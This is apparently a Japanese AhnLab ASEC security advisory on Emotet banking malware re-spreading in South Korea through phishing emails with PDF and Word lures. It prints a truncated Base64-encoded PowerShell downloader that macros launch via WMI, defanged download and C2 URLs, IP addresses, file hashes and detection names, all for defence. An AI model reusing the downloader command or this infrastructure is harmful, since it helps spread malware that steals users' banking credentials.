5か月ぶりに戻ってきたEmotetマルウェア!!韓国国内で拡散中

AhnLab ASEC 分析チームは本日、Emotet マルウェアが韓国国内で出回っていることを確認した。バンキングマルウェアである Emotet は今年2月を最後に拡散を中断していたが、5か月が経過した現在、再び拡散が始まったものと見られ、ユーザーの注意が必要である。

拡散手法は以前と同じように、フィッシングメールによって出回っている。メールのタイプは3種類が存在し、ダウンロードリンクが添付された形式と PDF ファイルが添付された形式、不正な文書ファイルが添付された形式に分けられる。添付されたリンクに接続すると、不正な文書ファイルをダウンロードすることになる。

[事例1] Word 文書ダウンロードリンク形式
[事例2] PDF 文書添付形式
[事例3] Word 文書添付形式

メールには DOC ファイルだけでなく、PDF 形式のファイルが添付されて出回ることもある。PDF ファイルには以下のように支払いに関する内容が含まれており、DocuSign のサイトに偽装したリンクが添付されている。しかし、このリンクをクリックすると「hxxp://braxmedia.nl/test/invoice/」にアクセスされ、不正な文書ファイルをダウンロードすることになる。

emotet ダウンロードアドレスに接続するpdf

最終的に実行される文書ファイルは不正なマクロが含まれている Word ファイルであり、マクロの使用を誘導している。

不正なマクロを含むWordファイル

 マクロを実行すると、WMI によって Base64 にエンコードされた powershell コマンドを実行する。このコマンドは、5つの url を通して Emotet をダウンロードする。

WMI によって実行されるpowershell
powersheLL -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAe
… (中略) …
cQB1AG8AYQBoAD0AJwB3AGEAdQB6AHQAaABvAHUAZAByAGkAYQB0AGcAdQB1AGMAaAB0AGkAYQBnAGMAdQBuACcA

デコードされたPowerShellコマンド

過去に Emotet は「–XXXXXXXX」という形式の引数値によって実行されていたが、現在 Emotet は特定の引数値なしで実行される。Emotet が動作すると C2 に接続し、攻撃者のコマンドを受けて不正な行為を実行し、コマンドに応じて Emotet のアップデート、不正なモジュールまたはマルウェアのダウンロードを実行できる。不正なモジュールは、ユーザー情報を奪取する情報奪取モジュールと共有フォルダ等を利用した伝播モジュールが存在する。また、ダウンロードされるマルウェアには Trickbot、Qakbot のようなバンキングマルウェアが存在する。

バンキング型マルウェアである Emotet はフィッシングメールを通して様々な形式で大量に出回っているため、ユーザーは出所が不明なメールの添付ファイルを開いてはならず、文書ファイル内部のマクロを実行してはならない。

現在 V3 では、関連ファイルおよび URL について以下の診断名で検知およびブロックを行っている。

[関連IOC情報]

[C2]

  • hxxp://biocharcoal.biz/assets/paclm/p1r67412932cras4kfuzu52xx9hf/
  • hxxp://gobisz.com/wp-content/wbhJWVHG/
  • hxxp://mytestingserver.ml/wp-admin/41m/
  • hxxps://gachchiuaxit.com/wp-admin/wkrl/
  • hxxp://ripro.martinface.com/wp-admin/nkf75/
  • hxxps://pan.martinface.com/CloudreveInstaller/gf6b59/
  • hxxp://108.48.41.69/
  • hxxp://201.173.217.124/

[HASH]

  • 409ef407df01d89c6873aeedf3e0fae4
  • 5b25288bd2ab2d4a5482847cda591912
  • 9b9ecfc4b5936ccd2ef06780819a0ced
  • 56f1eb5562803bd3b6de95210aedf8d4
  • 6f390b5ce578ea9da79d3de7004ea93e

[ファイルの診断]

  • Downloader/DOC.Emotet.S1072 (2020.01.31.04)
  • Downloader/MSOffice.Generic (2020.07.19.00)
  • Trojan/Win32.Emotet.C4164773 (2020.07.21.03)

[行為の診断]

  • Malware/MDP.Connect.M2367
  • Malware/MDP.Behavior.M2965

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments